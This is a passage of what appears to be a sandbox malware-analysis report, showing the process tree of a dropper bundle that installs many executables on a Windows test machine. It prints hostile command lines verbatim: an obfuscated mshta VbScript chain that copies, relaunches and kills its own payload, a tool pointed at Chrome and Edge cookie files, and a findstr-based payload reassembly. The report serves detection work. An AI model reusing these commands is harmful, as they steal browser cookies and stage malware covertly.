- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1532 -
C:\Users\Admin\AppData\Local\Temp\is-V2AN8.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-V2AN8.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3172 -
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:932 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629318565 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:1288
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
PID:3644 -
C:\Users\Admin\AppData\Local\Temp\is-NR0UR.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-NR0UR.tmp\VPN.tmp" /SL5="$102E4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3236 -
C:\Users\Admin\AppData\Local\Temp\is-U5F8L.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-U5F8L.tmp\Setup.exe" /silent /subid=7207⤵PID:6536
-
C:\Users\Admin\AppData\Local\Temp\is-MN6LO.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-MN6LO.tmp\Setup.tmp" /SL5="$20396,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-U5F8L.tmp\Setup.exe" /silent /subid=7208⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:3588 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵PID:7212
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵PID:7492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵PID:7296
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵PID:1956
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵PID:1424
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵PID:3000
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1128 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1128 -s 18646⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1540
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵PID:4476
-
C:\Users\Admin\AppData\Roaming\1932722.exe"C:\Users\Admin\AppData\Roaming\1932722.exe"6⤵
- Executes dropped EXE
PID:5204 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5204 -s 23847⤵
- Program crash
PID:7424
-
-
-
C:\Users\Admin\AppData\Roaming\1322028.exe"C:\Users\Admin\AppData\Roaming\1322028.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:5316
-
-
C:\Users\Admin\AppData\Roaming\2159448.exe"C:\Users\Admin\AppData\Roaming\2159448.exe"6⤵PID:5404
-
-
C:\Users\Admin\AppData\Roaming\3529569.exe"C:\Users\Admin\AppData\Roaming\3529569.exe"6⤵
- Executes dropped EXE
PID:5688
-
-
C:\Users\Admin\AppData\Roaming\1307511.exe"C:\Users\Admin\AppData\Roaming\1307511.exe"6⤵
- Executes dropped EXE
PID:5908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 24527⤵
- Program crash
PID:7996
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵
- Executes dropped EXE
PID:3916 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Executes dropped EXE
PID:2532
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
- Executes dropped EXE
PID:5132
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
- Executes dropped EXE
PID:1468
-
-
C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2668
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
- Executes dropped EXE
PID:2504
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
- Executes dropped EXE
PID:3088
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"5⤵
- Executes dropped EXE
PID:1256
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
- Executes dropped EXE
PID:736 -
C:\Users\Admin\Documents\ZfPC1NVhIXjAVHU_mR4CuAoE.exe"C:\Users\Admin\Documents\ZfPC1NVhIXjAVHU_mR4CuAoE.exe"6⤵
- Suspicious use of SetThreadContext
PID:5920 -
C:\Users\Admin\Documents\ZfPC1NVhIXjAVHU_mR4CuAoE.exeC:\Users\Admin\Documents\ZfPC1NVhIXjAVHU_mR4CuAoE.exe7⤵PID:3788
-
-
-
C:\Users\Admin\Documents\LP746NdZgoWGB1RPoCyhKclI.exe"C:\Users\Admin\Documents\LP746NdZgoWGB1RPoCyhKclI.exe"6⤵PID:5776
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\LP746NdZgoWGB1RPoCyhKclI.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\LP746NdZgoWGB1RPoCyhKclI.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )7⤵PID:1248
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\LP746NdZgoWGB1RPoCyhKclI.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\LP746NdZgoWGB1RPoCyhKclI.exe" ) do taskkill -f -iM "%~NxA"8⤵PID:4252
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "LP746NdZgoWGB1RPoCyhKclI.exe"9⤵
- Kills process with taskkill
PID:5428
-
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS9⤵PID:4116
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )10⤵PID:4164
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"11⤵PID:2212
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a10⤵PID:7992
-
-
-
-
-
-
C:\Users\Admin\Documents\CELl_sALPqvaSOQmhahq6lzx.exe"C:\Users\Admin\Documents\CELl_sALPqvaSOQmhahq6lzx.exe"6⤵
- Executes dropped EXE
PID:1140 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 3127⤵
- Program crash
PID:5280
-
-
-
C:\Users\Admin\Documents\rKZQiSfEjVrmrMwu_VTY2nfp.exe"C:\Users\Admin\Documents\rKZQiSfEjVrmrMwu_VTY2nfp.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4232 -
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"7⤵PID:4012
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:7152
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5048
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:3056
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5536
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵PID:1108
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"7⤵PID:7108
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:6340
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:1388
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:7908
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:8160
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:7480
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:7036
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:3460
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:5776
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:7344
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:7564
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:8072
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:1252
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5552
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:2956
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:668
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:4240
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5692
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5860
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5788
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5660
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5588
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:7492
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:7792
-
-
-
-
C:\Users\Admin\Documents\BE7dgnBwWbYWSbgH5D2WlRlA.exe"C:\Users\Admin\Documents\BE7dgnBwWbYWSbgH5D2WlRlA.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2372
-
-
C:\Users\Admin\Documents\KpxmZ28B_MMHfNWS6a3Q9Eyq.exe"C:\Users\Admin\Documents\KpxmZ28B_MMHfNWS6a3Q9Eyq.exe"6⤵
- Executes dropped EXE
PID:3096 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2568
-
-
-
C:\Users\Admin\Documents\BmG2DQfIMoE6pybE9bVYwjhf.exe"C:\Users\Admin\Documents\BmG2DQfIMoE6pybE9bVYwjhf.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3484 -
C:\Users\Admin\Documents\BmG2DQfIMoE6pybE9bVYwjhf.exe"C:\Users\Admin\Documents\BmG2DQfIMoE6pybE9bVYwjhf.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5544
-
-
-
C:\Users\Admin\Documents\1u1Bo7ciQh9CC9mtFsea8VmB.exe"C:\Users\Admin\Documents\1u1Bo7ciQh9CC9mtFsea8VmB.exe"6⤵
- Executes dropped EXE
PID:1504
-
-
C:\Users\Admin\Documents\tqPX35QmNG9xJkcyhLuu4VPq.exe"C:\Users\Admin\Documents\tqPX35QmNG9xJkcyhLuu4VPq.exe"6⤵
- Executes dropped EXE
PID:5568
-
-
C:\Users\Admin\Documents\p4SbTWyRkGxXw6NWI5i0MqoY.exe"C:\Users\Admin\Documents\p4SbTWyRkGxXw6NWI5i0MqoY.exe"6⤵
- Executes dropped EXE
PID:4576 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 2767⤵
- Program crash
PID:4984
-
-
-
C:\Users\Admin\Documents\eB4B9a3r3M8RbrEnRvE5DYlL.exe"C:\Users\Admin\Documents\eB4B9a3r3M8RbrEnRvE5DYlL.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5684
-
-
C:\Users\Admin\Documents\SBfKUJ5g1KhTeJyPK3yZ4bj2.exe"C:\Users\Admin\Documents\SBfKUJ5g1KhTeJyPK3yZ4bj2.exe"6⤵PID:6496
-
C:\Users\Admin\AppData\Roaming\1776251.exe"C:\Users\Admin\AppData\Roaming\1776251.exe"7⤵PID:7016
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7016 -s 23728⤵
- Program crash
PID:6256
-
-
-
C:\Users\Admin\AppData\Roaming\7473879.exe"C:\Users\Admin\AppData\Roaming\7473879.exe"7⤵PID:2932
-
-
C:\Users\Admin\AppData\Roaming\3522455.exe"C:\Users\Admin\AppData\Roaming\3522455.exe"7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 22728⤵
- Program crash
PID:7368
-
-
-
C:\Users\Admin\AppData\Roaming\1620261.exe"C:\Users\Admin\AppData\Roaming\1620261.exe"7⤵PID:4380
-
-
-
C:\Users\Admin\Documents\aaEUy90NsrjrRytFG_pAbfih.exe"C:\Users\Admin\Documents\aaEUy90NsrjrRytFG_pAbfih.exe"6⤵PID:6240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 3127⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4136
-
-
-
C:\Users\Admin\Documents\zekzHVvK5oJlk5Gr9DdX_ETr.exe"C:\Users\Admin\Documents\zekzHVvK5oJlk5Gr9DdX_ETr.exe"6⤵PID:6232
-
C:\Users\Admin\Documents\zekzHVvK5oJlk5Gr9DdX_ETr.exe"C:\Users\Admin\Documents\zekzHVvK5oJlk5Gr9DdX_ETr.exe" -q7⤵PID:1576
-
-
-
C:\Users\Admin\Documents\CnO68ZcStDg46oI6SazIJP6o.exe"C:\Users\Admin\Documents\CnO68ZcStDg46oI6SazIJP6o.exe"6⤵PID:6224
-
-
C:\Users\Admin\Documents\RuaBdkMsqlVweMJSC65kAAYk.exe"C:\Users\Admin\Documents\RuaBdkMsqlVweMJSC65kAAYk.exe"6⤵
- Suspicious use of SetThreadContext
PID:6216 -
C:\Users\Admin\Documents\RuaBdkMsqlVweMJSC65kAAYk.exeC:\Users\Admin\Documents\RuaBdkMsqlVweMJSC65kAAYk.exe7⤵PID:232
-
-
-
C:\Users\Admin\Documents\Yu3_9PM69xUD8seXQiYWM5mE.exe"C:\Users\Admin\Documents\Yu3_9PM69xUD8seXQiYWM5mE.exe"6⤵PID:6208
-
-
C:\Users\Admin\Documents\FONA0AWbmkXuPgsAljdsGTUp.exe"C:\Users\Admin\Documents\FONA0AWbmkXuPgsAljdsGTUp.exe"6⤵PID:4888
-
C:\Users\Admin\AppData\Local\Temp\is-U6ETU.tmp\FONA0AWbmkXuPgsAljdsGTUp.tmp"C:\Users\Admin\AppData\Local\Temp\is-U6ETU.tmp\FONA0AWbmkXuPgsAljdsGTUp.tmp" /SL5="$30326,138429,56832,C:\Users\Admin\Documents\FONA0AWbmkXuPgsAljdsGTUp.exe"7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:6032 -
C:\Users\Admin\AppData\Local\Temp\is-HHR36.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-HHR36.tmp\Setup.exe" /Verysilent8⤵PID:6604
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵PID:4772
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629318565 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵PID:7624
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
PID:4560 -
C:\Users\Admin\AppData\Local\Temp\tmpCF0D_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpCF0D_tmp.exe"6⤵
- Executes dropped EXE
PID:4552 -
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"7⤵PID:7112
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks7⤵PID:3128
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:5672
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks9⤵PID:4224
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i9⤵PID:6780
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵PID:4064
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵PID:7124
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵PID:3768
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵PID:3044
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵PID:5444
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵PID:7100
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵PID:6160
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵PID:3956
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵PID:5280
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵PID:7472
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵PID:1536
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵PID:7232
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵PID:2904
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵PID:4864
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵PID:4484
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵PID:5144
-
